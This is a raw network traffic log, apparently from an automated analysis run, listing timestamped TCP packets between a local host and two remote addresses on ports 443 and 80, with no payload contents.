                                                                                                                                                                                              Nov 24, 2024 13:39:31.005407095 CET4434976313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.059411049 CET4434976213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.062196970 CET49762443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:31.062248945 CET4434976213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.062654972 CET49762443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:31.062669039 CET4434976213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.065983057 CET4434975913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.066109896 CET4434975913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.066190958 CET49759443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:31.066325903 CET49759443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:31.066342115 CET4434975913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.066356897 CET49759443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:31.066363096 CET4434975913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.068783045 CET49764443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:31.068830013 CET4434976413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.069873095 CET49764443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:31.070029974 CET49764443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:31.070050001 CET4434976413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.090775013 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.090887070 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.090969086 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.091178894 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.091305017 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.091368914 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.092086077 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.092267036 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.092330933 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.092891932 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.129369974 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.129482031 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.129507065 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.129730940 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.129836082 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.129873991 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.130618095 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.130753040 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.130819082 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.131514072 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.131616116 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.131671906 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.132395029 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.132443905 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.132527113 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.133317947 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.133353949 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.133404016 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.134160042 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.134327888 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.134407997 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.135036945 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.135171890 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.135232925 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.136090040 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.136147976 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.136193991 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.136898994 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.136972904 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.137006044 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.137754917 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.137811899 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.137886047 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.138591051 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.138710976 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.138781071 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.139426947 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.139568090 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.139621973 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.140336037 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.140414953 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.140444994 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.141204119 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.141257048 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.141360998 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.142188072 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.142225027 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.142282963 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.142932892 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.143090010 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.143138885 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.143897057 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.143974066 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.144026995 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.144716978 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.144772053 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.144845963 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.145639896 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.145694017 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.145772934 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.146491051 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.146611929 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.146670103 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.147402048 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.147509098 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.147588015 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.148219109 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.148272038 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.148332119 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.149326086 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.149413109 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.149473906 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.150027037 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.150084019 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.150137901 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.150856018 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.150907993 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.150949001 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.151741982 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.151798010 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.151863098 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.152842999 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.152906895 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.152928114 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.153708935 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.153773069 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.153840065 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.154459000 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.154510975 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.154512882 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.155267000 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.155334949 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.155406952 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.156105995 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.156318903 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.156392097 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.157254934 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.157485008 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.157535076 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.157850981 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.158003092 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.158062935 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.158868074 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.158920050 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.158996105 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.159739971 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.159786940 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.159843922 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.160548925 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.160620928 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.160684109 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.161417961 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.161473036 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.161539078 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.162336111 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.162390947 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.162461042 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.163180113 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.163568020 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.163626909 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.164079905 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.164129019 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.164197922 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.164933920 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.164988041 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.165021896 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.165802956 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.165868998 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.165896893 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.166799068 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.166862011 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.166922092 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.167654991 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.167737961 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.167756081 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.168498993 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.168576002 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.168648005 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.169382095 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.169522047 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.169580936 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.170242071 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.170377970 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.170429945 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.171120882 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.171175957 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.171200037 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.171978951 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.172025919 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.172045946 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.214389086 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.301175117 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.301243067 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.301495075 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.301640987 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.301748991 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.301805019 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.302561998 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.302690983 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.302758932 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.303503990 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.339930058 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.340035915 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.340102911 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.340255022 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.340353012 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.340403080 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.341151953 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.341207027 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.341305971 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.342098951 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.342318058 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.342397928 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.342889071 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.342962027 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.342995882 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.343767881 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.343914032 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.343961954 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.344640970 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.344758987 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.344806910 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.345519066 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.345650911 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.345707893 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.346405983 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.346499920 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.346544981 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.347389936 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.347446918 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.347507000 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.348153114 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.348331928 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.348380089 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.349028111 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.349170923 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.349216938 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.349927902 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.350087881 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.350128889 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.350799084 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.350924969 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.350971937 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.351804972 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.351866007 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.351908922 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.352606058 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.352718115 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.352763891 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.353439093 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.353487968 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.353554964 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.354387045 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.354530096 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.354583979 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.355259895 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.355331898 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.355361938 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.356048107 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.356097937 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.356161118 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.356961012 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.357011080 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.357089043 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.357862949 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.357912064 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.357995987 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.358808041 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.358959913 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.359005928 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.359693050 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.359824896 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.359874010 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.360488892 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.360533953 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.360583067 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.361383915 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.361458063 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.361534119 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.362206936 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.362334967 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.362387896 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.363121986 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.363182068 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.363236904 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.363976002 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.364021063 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.364100933 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.364856005 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.364914894 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.364990950 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.365756989 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.365830898 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.365869999 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.366641045 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.366739988 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.366767883 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.367518902 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.367569923 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.367630005 CET8049752185.215.113.16192.168.2.6
